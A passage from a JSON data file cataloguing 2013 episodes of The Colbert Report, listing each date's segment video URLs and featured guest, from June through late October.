        "http://thecolbertreport.cc.com/videos/oc2w3x/edward-snowden-s-nsa-leaks",
        "http://thecolbertreport.cc.com/videos/bkbpaj/the-imploding-muslim-country-of-the-week---turkey",
        "http://thecolbertreport.cc.com/videos/rnftw3/the-imploding-muslim-country-of-the-week---turkey---omer-taspinar",
        "http://thecolbertreport.cc.com/videos/147u1d/cold-war-update---nuclear-launch-careers",
        "http://thecolbertreport.cc.com/videos/vii2l9/dan-savage",
        "http://thecolbertreport.cc.com/videos/kmqz9h/sign-off---the-imploding-muslim-country-of-the-week-booth"
      ],
      "guest": "Dan Savage"
    },
    {
      "date": "2013-06-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ctjh9s/intro---6-11-13",
        "http://thecolbertreport.cc.com/videos/1mm086/prism-surveillance-program",
        "http://thecolbertreport.cc.com/videos/jejy0d/prism-surveillance-program---jeffrey-rosen",
        "http://thecolbertreport.cc.com/videos/sa86i9/chewbacca-s-tsa-encounter",
        "http://thecolbertreport.cc.com/videos/s2d0lp/daniel-bergner",
        "http://thecolbertreport.cc.com/videos/x7nfzj/sign-off---goodnight"
      ],
      "guest": "Daniel Bergner"
    },
    {
      "date": "2013-06-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jdqve3/stephen-colbert-s-tribute-to-having-paul-mccartney-on-his-show",
        "http://thecolbertreport.cc.com/videos/eweibb/nsa-scandal-developments",
        "http://thecolbertreport.cc.com/videos/9i45f0/paul-mccartney",
        "http://thecolbertreport.cc.com/videos/2ildb8/nyc-bike-share"
      ],
      "guest": "Paul McCartney"
    },
    {
      "date": "2013-06-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yxgnju/remembering-lorna-colbert",
        "http://thecolbertreport.cc.com/videos/jm7bya/cap-n-crunch-scandal",
        "http://thecolbertreport.cc.com/videos/rtfkei/tip-wag---wall-street---north-carolina",
        "http://thecolbertreport.cc.com/videos/vztqfg/the-postal-service",
        "http://thecolbertreport.cc.com/videos/7vr4pz/sign-off---stage-fall"
      ],
      "guest": "The Postal Service"
    },
    {
      "date": "2013-06-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/616g0e/intro---6-20-13",
        "http://thecolbertreport.cc.com/videos/v8ee5f/iran-s-presidential-election",
        "http://thecolbertreport.cc.com/videos/k3dodo/steve-king-on-chicken-cages",
        "http://thecolbertreport.cc.com/videos/7udg5z/nestle-s-natural-resource",
        "http://thecolbertreport.cc.com/videos/0mw5zk/joss-whedon",
        "http://thecolbertreport.cc.com/videos/ooshhr/sign-off---paper-towel-tube-cage"
      ],
      "guest": "Joss Whedon"
    },
    {
      "date": "2013-06-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6gyv8z/the-irs---darrell-issa-s-gut",
        "http://thecolbertreport.cc.com/videos/oztyjs/the-word---truthinews",
        "http://thecolbertreport.cc.com/videos/93t9s1/tiny-triumphs---laser-klan",
        "http://thecolbertreport.cc.com/videos/dzzcx7/andrew-solomon",
        "http://thecolbertreport.cc.com/videos/h7v6sr/sign-off---goodnight"
      ],
      "guest": "Andrew Solomon"
    },
    {
      "date": "2013-06-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g5p8y4/intro---6-25-13",
        "http://thecolbertreport.cc.com/videos/348hon/scotus-on-the-voting-rights-act",
        "http://thecolbertreport.cc.com/videos/ysuxww/brazil-s-political-protests",
        "http://thecolbertreport.cc.com/videos/3gv8et/brazil-s-political-protests---larry-rohter",
        "http://thecolbertreport.cc.com/videos/mnxaxk/george-zimmerman-s-murder-trial",
        "http://thecolbertreport.cc.com/videos/ip1pn0/peniel-joseph",
        "http://thecolbertreport.cc.com/videos/b4zgvh/sign-off---goodnight"
      ],
      "guest": "Peniel Joseph"
    },
    {
      "date": "2013-06-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/m2xuu4/intro---6-26-13",
        "http://thecolbertreport.cc.com/videos/nzd784/the-supreme-court-rules-on-doma",
        "http://thecolbertreport.cc.com/videos/um981i/the-end-of-the-voting-rights-act",
        "http://thecolbertreport.cc.com/videos/btpztg/the-voting-rights-act---gay-marriage---emily-bazelon",
        "http://thecolbertreport.cc.com/videos/3ca2a0/bill-moyers",
        "http://thecolbertreport.cc.com/videos/09w1k9/sign-off---goodnight"
      ],
      "guest": "Bill Moyers"
    },
    {
      "date": "2013-06-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9lyyd3/4th-of-july-under-attack",
        "http://thecolbertreport.cc.com/videos/3wbx1d/stephen-colbert-s-big-gay-roundup",
        "http://thecolbertreport.cc.com/videos/ncxmfs/-gang-of-eight--immigration-reform-bill",
        "http://thecolbertreport.cc.com/videos/0gj3ie/chuck-schumer",
        "http://thecolbertreport.cc.com/videos/6kec7y/sign-off---goodnight"
      ],
      "guest": "Sen. Chuck Schumer"
    },
    {
      "date": "2013-07-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6jl3zv/stephen-s-vacation",
        "http://thecolbertreport.cc.com/videos/0gzuno/george-zimmerman-verdict",
        "http://thecolbertreport.cc.com/videos/9nhthn/people-who-are-destroying-america---lynn-harrell",
        "http://thecolbertreport.cc.com/videos/6dlnrd/ktvu-tv-on-asiana-airlines-crash",
        "http://thecolbertreport.cc.com/videos/vwtsg0/jeremy-scahill",
        "http://thecolbertreport.cc.com/videos/88fai0/sign-off---goodnight"
      ],
      "guest": "Jeremy Scahill"
    },
    {
      "date": "2013-07-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2ymeh3/intro---7-16-13",
        "http://thecolbertreport.cc.com/videos/rr5gb5/royal-baby-bump",
        "http://thecolbertreport.cc.com/videos/dd82ys/tip-wag---non-rioting-black-people---fox-news",
        "http://thecolbertreport.cc.com/videos/e8110o/npr-on-multitasking",
        "http://thecolbertreport.cc.com/videos/e5obyh/david-karp",
        "http://thecolbertreport.cc.com/videos/0mvlz8/sign-off---macbox"
      ],
      "guest": "David Karp"
    },
    {
      "date": "2013-07-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/84x6wp/rolling-stone-s-boston-bomber-cover",
        "http://thecolbertreport.cc.com/videos/eiwwmp/dysfunctional-house-republicans---immigration-reform",
        "http://thecolbertreport.cc.com/videos/dii80x/food-stamp-funding",
        "http://thecolbertreport.cc.com/videos/279goq/jerry-seinfeld-pt--1",
        "http://thecolbertreport.cc.com/videos/pw17w7/jerry-seinfeld-pt--2",
        "http://thecolbertreport.cc.com/videos/qfpfy4/sign-off---paper-fan"
      ],
      "guest": "Jerry Seinfeld"
    },
    {
      "date": "2013-07-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r4piw8/edward-snowden-s-asylum-option",
        "http://thecolbertreport.cc.com/videos/2m27vd/political-sex-scandals---new-york-city-elections",
        "http://thecolbertreport.cc.com/videos/dpebt7/political-sex-scandals---new-york-city-elections---eliot-spitzer",
        "http://thecolbertreport.cc.com/videos/m8rn8j/breaking-news-on-college-sex",
        "http://thecolbertreport.cc.com/videos/y56hes/jeff-bridges",
        "http://thecolbertreport.cc.com/videos/fiop8t/sign-off----operation-javelin-"
      ],
      "guest": "Jeff Bridges"
    },
    {
      "date": "2013-07-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/20zlbx/britain-s-royal-baby",
        "http://thecolbertreport.cc.com/videos/d0bn33/geraldo-rivera-s-tribute-to-helen-thomas",
        "http://thecolbertreport.cc.com/videos/8fg72p/minimum-wage---mcdonald-s-spending-journal",
        "http://thecolbertreport.cc.com/videos/0p9n45/neil-degrasse-tyson-s-alien-theory",
        "http://thecolbertreport.cc.com/videos/3azmuc/kjerstin-gruys",
        "http://thecolbertreport.cc.com/videos/mritg0/sign-off---linguini-worm"
      ],
      "guest": "Kjerstin Gruys"
    },
    {
      "date": "2013-07-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/y6fmk6/royal-afterbirth--013-",
        "http://thecolbertreport.cc.com/videos/adczam/george-zimmerman---racial-tensions",
        "http://thecolbertreport.cc.com/videos/3vijkd/the-word---color-bind",
        "http://thecolbertreport.cc.com/videos/vbghld/domino-s-pizza-drone",
        "http://thecolbertreport.cc.com/videos/5tqazj/kenneth-goldsmith",
        "http://thecolbertreport.cc.com/videos/fvgc0u/sign-off---goodnight"
      ],
      "guest": "Kenneth Goldsmith"
    },
    {
      "date": "2013-07-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/508jwm/royal-baby-fever",
        "http://thecolbertreport.cc.com/videos/eodctw/anthony-weiner-s-penis",
        "http://thecolbertreport.cc.com/videos/4sgopv/carlos-danger--secret-mayor",
        "http://thecolbertreport.cc.com/videos/bf89i9/kanye-west-s-clothing-line",
        "http://thecolbertreport.cc.com/videos/zwqhae/anant-agarwal",
        "http://thecolbertreport.cc.com/videos/gbago4/sign-off---goodnight"
      ],
      "guest": "Anant Agarwal"
    },
    {
      "date": "2013-07-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/l1dtzt/london-s-fake-town-crier",
        "http://thecolbertreport.cc.com/videos/lyjdmu/detroit-s-bankruptcy",
        "http://thecolbertreport.cc.com/videos/h9c7gh/detroit-s-bankruptcy---stephen-henderson",
        "http://thecolbertreport.cc.com/videos/8chokd/steve-king-s-immigrant-analogy",
        "http://thecolbertreport.cc.com/videos/263vwc/olympia-snowe",
        "http://thecolbertreport.cc.com/videos/kx84kd/sign-off---hand-bell"
      ],
      "guest": "Olympia Snowe"
    },
    {
      "date": "2013-07-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uw17hh/intro---7-29-13",
        "http://thecolbertreport.cc.com/videos/n0w3zw/obamacare-cards",
        "http://thecolbertreport.cc.com/videos/pna3x8/tip-wag---steve-stockman--david-cameron---north-carolina-legislature",
        "http://thecolbertreport.cc.com/videos/2i98l3/the-lumineers",
        "http://thecolbertreport.cc.com/videos/1i7dzf/sign-off---tambourine"
      ],
      "guest": "The Lumineers"
    },
    {
      "date": "2013-07-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/trrcbd/intro---7-30-13",
        "http://thecolbertreport.cc.com/videos/mulhwo/smokin--pole---the-quest-for-arctic-riches--north-pole-lake",
        "http://thecolbertreport.cc.com/videos/gr77sg/senator-gridlock",
        "http://thecolbertreport.cc.com/videos/hrha3p/the-word---secrets---laws",
        "http://thecolbertreport.cc.com/videos/jah6al/ted-cruz-s-humble-portrait",
        "http://thecolbertreport.cc.com/videos/bhod50/atul-gawande",
        "http://thecolbertreport.cc.com/videos/c1f9z7/sign-off---sleigh-bells"
      ],
      "guest": "Atul Gawande"
    },
    {
      "date": "2013-07-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4dtx20/intro---7-31-13",
        "http://thecolbertreport.cc.com/videos/6p4joy/bradley-manning-verdict",
        "http://thecolbertreport.cc.com/videos/hcbpix/lunch-or-campaign-2016-",
        "http://thecolbertreport.cc.com/videos/21zxm1/chris-christie-vs--rand-paul",
        "http://thecolbertreport.cc.com/videos/zyu4c8/stephen-colbert-s-super-coin-toss",
        "http://thecolbertreport.cc.com/videos/ngxjwr/emily-matchar",
        "http://thecolbertreport.cc.com/videos/f1q01l/sign-off---game-over"
      ],
      "guest": "Emily Matchar"
    },
    {
      "date": "2013-08-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s9hzk7/intro---8-1-13",
        "http://thecolbertreport.cc.com/videos/09hbf0/edward-snowden-s-asylum",
        "http://thecolbertreport.cc.com/videos/o0rsdt/oppressed-white-male-alert---bob-filner",
        "http://thecolbertreport.cc.com/videos/y8ilbl/grab-ask-5800",
        "http://thecolbertreport.cc.com/videos/opj4x1/threatdown---global-erotic-extremism--mini-muslims---stripper-bears",
        "http://thecolbertreport.cc.com/videos/gyog46/bryan-cranston",
        "http://thecolbertreport.cc.com/videos/qv7up3/sign-off---goodnight"
      ],
      "guest": "Bryan Cranston"
    },
    {
      "date": "2013-08-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/n525ux/global-terror-warning",
        "http://thecolbertreport.cc.com/videos/1y9s5s/sport-report---a-rod-s-drug-scandal---combat-juggling",
        "http://thecolbertreport.cc.com/videos/91y2gj/hugh-laurie",
        "http://thecolbertreport.cc.com/videos/g0yu17/broadcast-networks-want-more-indecency",
        "http://thecolbertreport.cc.com/videos/n9o8qy/sign-off---glossary-of-terms"
      ],
      "guest": "Hugh Laurie"
    },
    {
      "date": "2013-08-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4ybtps/stephest-colbchella--013---the-song-of-the-summer-of-the-century",
        "http://thecolbertreport.cc.com/videos/s9j4ux/stephest-colbchella--013---special-guest-stephen-colbert-"
      ],
      "guest": "Robin Thicke"
    },
    {
      "date": "2013-08-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0t0r8t/stephest-colbchella--013---disco-decepticons",
        "http://thecolbertreport.cc.com/videos/je51p5/rich-white-guys-agreeing-with-each-other-alert---neil-cavuto",
        "http://thecolbertreport.cc.com/videos/m9o287/fast-food-workers-strike---mary-kay-henry",
        "http://thecolbertreport.cc.com/videos/b0jyca/sec-vs--fabulous-fab",
        "http://thecolbertreport.cc.com/videos/rrfnhj/ashton-kutcher",
        "http://thecolbertreport.cc.com/videos/iqw6df/sign-off---goodnight"
      ],
      "guest": "Ashton Kutcher"
    },
    {
      "date": "2013-08-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ehgkke/ganjay-supta",
        "http://thecolbertreport.cc.com/videos/x55kjy/hollywood-heroes",
        "http://thecolbertreport.cc.com/videos/lual8r/hollywood-heroes---matt-damon",
        "http://thecolbertreport.cc.com/videos/qqmmcz/the-ronald-wilson-reagan-economic-breathing-zone",
        "http://thecolbertreport.cc.com/videos/6duz1s/colum-mccann",
        "http://thecolbertreport.cc.com/videos/fama3f/sign-off----fifty-shades-of-grey-"
      ],
      "guest": "Colum McCann"
    },
    {
      "date": "2013-08-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/m7rv7i/badonkadonk-journalism",
        "http://thecolbertreport.cc.com/videos/qokabz/better-know-a-district---new-jersey-s-12th",
        "http://thecolbertreport.cc.com/videos/vni3w0/better-know-a-district---new-jersey-s-12th---rush-holt",
        "http://thecolbertreport.cc.com/videos/swss3n/innocent-tourist-mistake",
        "http://thecolbertreport.cc.com/videos/lixrq0/sheldon-whitehouse",
        "http://thecolbertreport.cc.com/videos/ck9vu0/sign-off---goodnight"
      ],
      "guest": "Sen. Sheldon Whitehouse"
    },
    {
      "date": "2013-08-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jtshn3/stop-and-frisk---mandatory-minimums",
        "http://thecolbertreport.cc.com/videos/o5aiwi/tsa-expansion-program",
        "http://thecolbertreport.cc.com/videos/miwb3z/tsa-expansion-program---steven-pinker",
        "http://thecolbertreport.cc.com/videos/pd148a/john-lewis-pt--1",
        "http://thecolbertreport.cc.com/videos/ocqoae/john-lewis-pt--2",
        "http://thecolbertreport.cc.com/videos/z6ytj0/sign-off----the-better-angels-of-our-nature-"
      ],
      "guest": "Rep. John Lewis"
    },
    {
      "date": "2013-08-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/als8jg/intro---8-14-13",
        "http://thecolbertreport.cc.com/videos/wjgfbx/sochi-2014-winter-olympics",
        "http://thecolbertreport.cc.com/videos/y58ew9/people-who-are-destroying-america---johnny-cummings",
        "http://thecolbertreport.cc.com/videos/oafmw7/big-mother-government",
        "http://thecolbertreport.cc.com/videos/wc12me/kevin-spacey",
        "http://thecolbertreport.cc.com/videos/o1qztj/sign-off---goodnight"
      ],
      "guest": "Kevin Spacey"
    },
    {
      "date": "2013-08-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fwx35y/obama-rodeo-clown",
        "http://thecolbertreport.cc.com/videos/0bdl0z/golden-age-of-flammability",
        "http://thecolbertreport.cc.com/videos/r9ju4t/the-word---gag-gift",
        "http://thecolbertreport.cc.com/videos/jngkv0/nsa-press-conference-on-domestic-spying",
        "http://thecolbertreport.cc.com/videos/8ax5jq/richard-brodhead",
        "http://thecolbertreport.cc.com/videos/42qo92/sign-off---second-installment-of-colbert-s-book-club"
      ],
      "guest": "Richard Brodhead"
    },
    {
      "date": "2013-09-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pkboc3/exclusive---better-know-a-district---michigan-s-5th---dan-kildee",
        "http://thecolbertreport.cc.com/videos/pnf1sx/intro---9-3-13",
        "http://thecolbertreport.cc.com/videos/tx5zzr/stephen-s-science-project---chemical-weapons-in-syria",
        "http://thecolbertreport.cc.com/videos/dhyi3l/better-know-a-district---michigan-s-5th---dan-kildee",
        "http://thecolbertreport.cc.com/videos/pwzlgj/timothy-dolan-pt--1",
        "http://thecolbertreport.cc.com/videos/m4p07o/timothy-dolan-pt--2",
        "http://thecolbertreport.cc.com/videos/xws5t1/sign-off---welcome-baby-rosta-"
      ],
      "guest": "Timothy Cardinal Dolan"
    },
    {
      "date": "2013-09-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4obytf/intro---9-4-13",
        "http://thecolbertreport.cc.com/videos/020ri3/cris-ish-in-syri-eh",
        "http://thecolbertreport.cc.com/videos/jtjmpo/cris-ish-in-syri-eh---steve-coll",
        "http://thecolbertreport.cc.com/videos/hrfvxe/perfect-polly",
        "http://thecolbertreport.cc.com/videos/q9zsg7/gary-england",
        "http://thecolbertreport.cc.com/videos/jnebqk/sign-off---goodnight"
      ],
      "guest": "Gary England"
    },
    {
      "date": "2013-09-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fzzhny/intro---9-5-13",
        "http://thecolbertreport.cc.com/videos/cgxdol/smile-file---ariel-castro---the-eric-bolling-sunshine-express",
        "http://thecolbertreport.cc.com/videos/cn86ce/kitten-subway-crisis---the-new-york-city-mayoral-race",
        "http://thecolbertreport.cc.com/videos/l0disu/colbert-s-book-club---the-couch-bunker",
        "http://thecolbertreport.cc.com/videos/ub6jy0/john-prine"
      ],
      "guest": "John Prine"
    },
    {
      "date": "2013-09-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/m0qnfl/egypt-s-stork-bust",
        "http://thecolbertreport.cc.com/videos/4zp755/syrian-conflict-action-plan",
        "http://thecolbertreport.cc.com/videos/jvhzt0/ronald-reagan-on-the-syrian-conflict",
        "http://thecolbertreport.cc.com/videos/a4utu0/tip-wag---iowa--bigger-pants---recent-articles",
        "http://thecolbertreport.cc.com/videos/f9cuxl/billie-jean-king",
        "http://thecolbertreport.cc.com/videos/2dw2cm/sign-off---spider-reagan"
      ],
      "guest": "Billie Jean King"
    },
    {
      "date": "2013-09-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/o8sjcq/colbert-s-book-club---j-d--salinger",
        "http://thecolbertreport.cc.com/videos/49qji6/colbert-s-book-club---better-know-a-salinger",
        "http://thecolbertreport.cc.com/videos/ueo7a2/colbert-s-book-club---tobias-wolff----the-catcher-in-the-rye-",
        "http://thecolbertreport.cc.com/videos/f2a6ao/colbert-s-book-club---shane-salerno-on-j-d--salinger",
        "http://thecolbertreport.cc.com/videos/2p7nwl/sign-off---colbert-s-book-club---j-d--salinger-s-glass-family"
      ],
      "guest": "Shane Salerno"
    },
    {
      "date": "2013-09-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lop9g2/new-york-city-mayoral-primary",
        "http://thecolbertreport.cc.com/videos/pymjnx/america-s-got-serious-reservations-about-this---syria",
        "http://thecolbertreport.cc.com/videos/cta0kn/america-s-got-serious-reservations-about-this---syria---rand-paul",
        "http://thecolbertreport.cc.com/videos/w9ejb1/barack-obama-s-footgate---secret-muslim-code",
        "http://thecolbertreport.cc.com/videos/p83qs9/sheryl-crow"
      ],
      "guest": "Sheryl Crow"
    },
    {
      "date": "2013-09-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r3zogj/vladimir-putin-s-op-ed-photos",
        "http://thecolbertreport.cc.com/videos/bujbay/better-know-a-district---washington-s-7th---jim-mcdermott",
        "http://thecolbertreport.cc.com/videos/7z7vfu/vladimir-putin-s-op-ed-on-u-s--intervention-in-syria",
        "http://thecolbertreport.cc.com/videos/cm16zd/philip-mudd",
        "http://thecolbertreport.cc.com/videos/4lw1cp/sign-off---goodnight"
      ],
      "guest": "Philip Mudd"
    },
    {
      "date": "2013-09-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/weeyn5/intro---9-16-13",
        "http://thecolbertreport.cc.com/videos/2lxvvp/lehman-brothers-anniversary---economic-recovery",
        "http://thecolbertreport.cc.com/videos/ggices/the-word---the-guilted-age",
        "http://thecolbertreport.cc.com/videos/vui8um/miss-america-2013",
        "http://thecolbertreport.cc.com/videos/v77k60/andrew-bacevich",
        "http://thecolbertreport.cc.com/videos/c31p0i/sign-off---financial-crisis-anniversary-cake"
      ],
      "guest": "Andrew Bacevich"
    },
    {
      "date": "2013-09-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qkhrkt/intro---9-17-13",
        "http://thecolbertreport.cc.com/videos/hwlkz5/the-people-s-republic-of-obamastan---forbes-400-losers",
        "http://thecolbertreport.cc.com/videos/cgb0cw/colbert-platinum---luxury-ice---hot-dic-tip",
        "http://thecolbertreport.cc.com/videos/rkpujl/soul-rending-cheerios-ad",
        "http://thecolbertreport.cc.com/videos/2dwhox/arne-duncan",
        "http://thecolbertreport.cc.com/videos/ukxkfk/sign-off---goodnight"
      ],
      "guest": "Arne Duncan"
    },
    {
      "date": "2013-09-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g7l8kk/syria-conflict---end-times-prophecy",
        "http://thecolbertreport.cc.com/videos/8pp3si/united-nations-on-syria-conflict---andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/v0wk5h/navy-yard-shooting---gun-violence-causes",
        "http://thecolbertreport.cc.com/videos/ft7l84/nicholson-baker",
        "http://thecolbertreport.cc.com/videos/lpg81o/sign-off----damascus-countdown-"
      ],
      "guest": "Nicholson Baker"
    },
    {
      "date": "2013-09-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1j1cxh/michelle-obama-s-h2o-campaign",
        "http://thecolbertreport.cc.com/videos/4iux0d/obamacare-government-shutdown",
        "http://thecolbertreport.cc.com/videos/6nrq55/obamacare-navigators",
        "http://thecolbertreport.cc.com/videos/7qwiwv/tip-wag---hammunition---george-clooney",
        "http://thecolbertreport.cc.com/videos/x5xw6g/jack-johnson"
      ],
      "guest": "Jack Johnson"
    },
    {
      "date": "2013-09-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ecu59e/stephen-s-emmy-awards",
        "http://thecolbertreport.cc.com/videos/nsfkr7/on-notice---pope-francis",
        "http://thecolbertreport.cc.com/videos/vb7ms1/on-notice---pope-francis---jim-martin",
        "http://thecolbertreport.cc.com/videos/7xtam8/metallica",
        "http://thecolbertreport.cc.com/videos/g9dzis/sign-off---emmy-exhibition"
      ],
      "guest": "Metallica"
    },
    {
      "date": "2013-09-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8fmvel/censorship-for-youtube-comments",
        "http://thecolbertreport.cc.com/videos/lsiidb/sport-report---cranium-coddlers---san-francisco-street-chess---floyd-mayweather",
        "http://thecolbertreport.cc.com/videos/ks6rd5/ted-cruz-s-obamacare--filibuster-",
        "http://thecolbertreport.cc.com/videos/urqr8j/joseph-gordon-levitt",
        "http://thecolbertreport.cc.com/videos/93nnw6/sign-off---ring-announcer"
      ],
      "guest": "Joseph Gordon-Levitt"
    },
    {
      "date": "2013-09-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/itk7kp/americone-dream-product-placement",
        "http://thecolbertreport.cc.com/videos/u1mo7v/chris-fischer",
        "http://thecolbertreport.cc.com/videos/lo2m3c/intro---9-26-13",
        "http://thecolbertreport.cc.com/videos/153u0a/sign-off---goodnight",
        "http://thecolbertreport.cc.com/videos/87ddew/time-travel-adventures-with-conservatives"
      ],
      "guest": "Chris Fischer"
    },
    {
      "date": "2013-09-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mp715j/rockin--government-shutdown-eve",
        "http://thecolbertreport.cc.com/videos/pbvraa/tip-wag---butterball--ashley-merryman---science",
        "http://thecolbertreport.cc.com/videos/wzj7bh/vince-gilligan-pt--1",
        "http://thecolbertreport.cc.com/videos/xid9jc/vince-gilligan-pt--2"
      ],
      "guest": "Vince Gilligan"
    },
    {
      "date": "2013-10-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/99odk6/federal-government-shutdown",
        "http://thecolbertreport.cc.com/videos/cn352h/affordable-care-act---obama-s-computerized-america",
        "http://thecolbertreport.cc.com/videos/1ntmd2/adorable-care-act---generation-opportunity",
        "http://thecolbertreport.cc.com/videos/gfz4h7/national-hispanic-heritage-month",
        "http://thecolbertreport.cc.com/videos/obk0r1/daniel-radcliffe",
        "http://thecolbertreport.cc.com/videos/7ni2qs/sign-off---goodnight"
      ],
      "guest": "Daniel Radcliffe"
    },
    {
      "date": "2013-10-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/aykl9k/intro---10-2-13",
        "http://thecolbertreport.cc.com/videos/qx1ar9/1995-shutdown-survival-bunker",
        "http://thecolbertreport.cc.com/videos/qz6a9i/government--slimdown----potus-meeting",
        "http://thecolbertreport.cc.com/videos/xjdheq/blood-in-the-water---bill-o-reilly-s--killing-jesus-",
        "http://thecolbertreport.cc.com/videos/5ynb8q/chris-matthews",
        "http://thecolbertreport.cc.com/videos/mvs3wz/sign-off---shutdown-survival-bunker"
      ],
      "guest": "Chris Matthews"
    },
    {
      "date": "2013-10-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7l0bys/government-shutdown-day-three",
        "http://thecolbertreport.cc.com/videos/amjasd/the-2013-government-shutdown-wedding-of-the-century-pt--1",
        "http://thecolbertreport.cc.com/videos/qt2vrd/david-finkel",
        "http://thecolbertreport.cc.com/videos/6as11u/sign-off---audra-mcdonald-s-availability"
      ],
      "guest": "David Finkel"
    },
    {
      "date": "2013-10-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/iyj9i2/government-shutdown-s-one-week-anniversary",
        "http://thecolbertreport.cc.com/videos/f9ohl9/bond-v--united-states",
        "http://thecolbertreport.cc.com/videos/rodf66/mccutcheon-v--fec---emily-bazelon",
        "http://thecolbertreport.cc.com/videos/d10tae/banksy-s-new-york-reign-of-terror",
        "http://thecolbertreport.cc.com/videos/feyjl3/james-spithill",
        "http://thecolbertreport.cc.com/videos/m7oe3o/sign-off----not-a-game--game"
      ],
      "guest": "James Spithill"
    },
    {
      "date": "2013-10-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/phldtj/intro---10-8-13",
        "http://thecolbertreport.cc.com/videos/u5kkik/debt-ceiling-deadline",
        "http://thecolbertreport.cc.com/videos/2b5rst/pro-pot-laws---pointers",
        "http://thecolbertreport.cc.com/videos/049124/thanksgiving-under-attack---hanukkah",
        "http://thecolbertreport.cc.com/videos/llhqmr/paul-giamatti",
        "http://thecolbertreport.cc.com/videos/tuzaza/sign-off----tj---dave-"
      ],
      "guest": "Paul Giamatti"
    },
    {
      "date": "2013-10-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pjgp86/intro---10-9-13",
        "http://thecolbertreport.cc.com/videos/ssksja/ride-for-the-constitution",
        "http://thecolbertreport.cc.com/videos/h502rh/twitter-s-ipo",
        "http://thecolbertreport.cc.com/videos/k9g3h2/tom-emmer-s-controversial-ad",
        "http://thecolbertreport.cc.com/videos/ldxsu2/tom-hanks",
        "http://thecolbertreport.cc.com/videos/uevql0/sign-off---goodnight"
      ],
      "guest": "Tom Hanks"
    },
    {
      "date": "2013-10-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xqbppa/government-shutdown-day-10---shep-smith-s-input",
        "http://thecolbertreport.cc.com/videos/bzo5fv/because-shep---fox-news-deck",
        "http://thecolbertreport.cc.com/videos/rt3php/because-shep---fox-news-deck---colbert-info-news-veranda",
        "http://thecolbertreport.cc.com/videos/r2mded/hanksy-s-grizzly-art",
        "http://thecolbertreport.cc.com/videos/twnvtr/reed-albergotti---vanessa-o-connell",
        "http://thecolbertreport.cc.com/videos/gn1hnb/sign-off---goodnight"
      ],
      "guest": "Reed Albergotti &amp; Vanessa O'Connell"
    },
    {
      "date": "2013-10-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zabrcj/end-of-the-government-shutdown",
        "http://thecolbertreport.cc.com/videos/fs5lvs/tip-wag---new-jersey--robo-teachers---amazon-erotica",
        "http://thecolbertreport.cc.com/videos/xmc07q/the-reflektors",
        "http://thecolbertreport.cc.com/videos/z30io4/sign-off----midnight"
      ],
      "guest": "The Reflektors"
    },
    {
      "date": "2013-10-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0nhfjd/intro---10-22-13",
        "http://thecolbertreport.cc.com/videos/tpp3c7/the-in-box---lions-vs--tigers",
        "http://thecolbertreport.cc.com/videos/w4k85n/thought-for-food---kfc-s-go-cup---powerful-yogurt",
        "http://thecolbertreport.cc.com/videos/wv85sy/the-neiman-marcus-christmas-book",
        "http://thecolbertreport.cc.com/videos/413dai/a--scott-berg",
        "http://thecolbertreport.cc.com/videos/j9enbw/sign-off----the-heart-of-giving-"
      ],
      "guest": "A. Scott Berg"
    },
    {
      "date": "2013-10-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pfan07/obamacare-website-gate",
        "http://thecolbertreport.cc.com/videos/51c17c/i-tried-to-sign-up-for-obamacare---health-care-house-of-horrors",
        "http://thecolbertreport.cc.com/videos/w07qf1/i-tried-to-sign-up-for-obamacare---health-care-navigators",
        "http://thecolbertreport.cc.com/videos/j95qfd/judy-woodruff---gwen-ifill",
        "http://thecolbertreport.cc.com/videos/rtpako/sign-off---goodnight"
      ],
      "guest": "Gwen Ifill, Judy Woodruff"
    },
    {
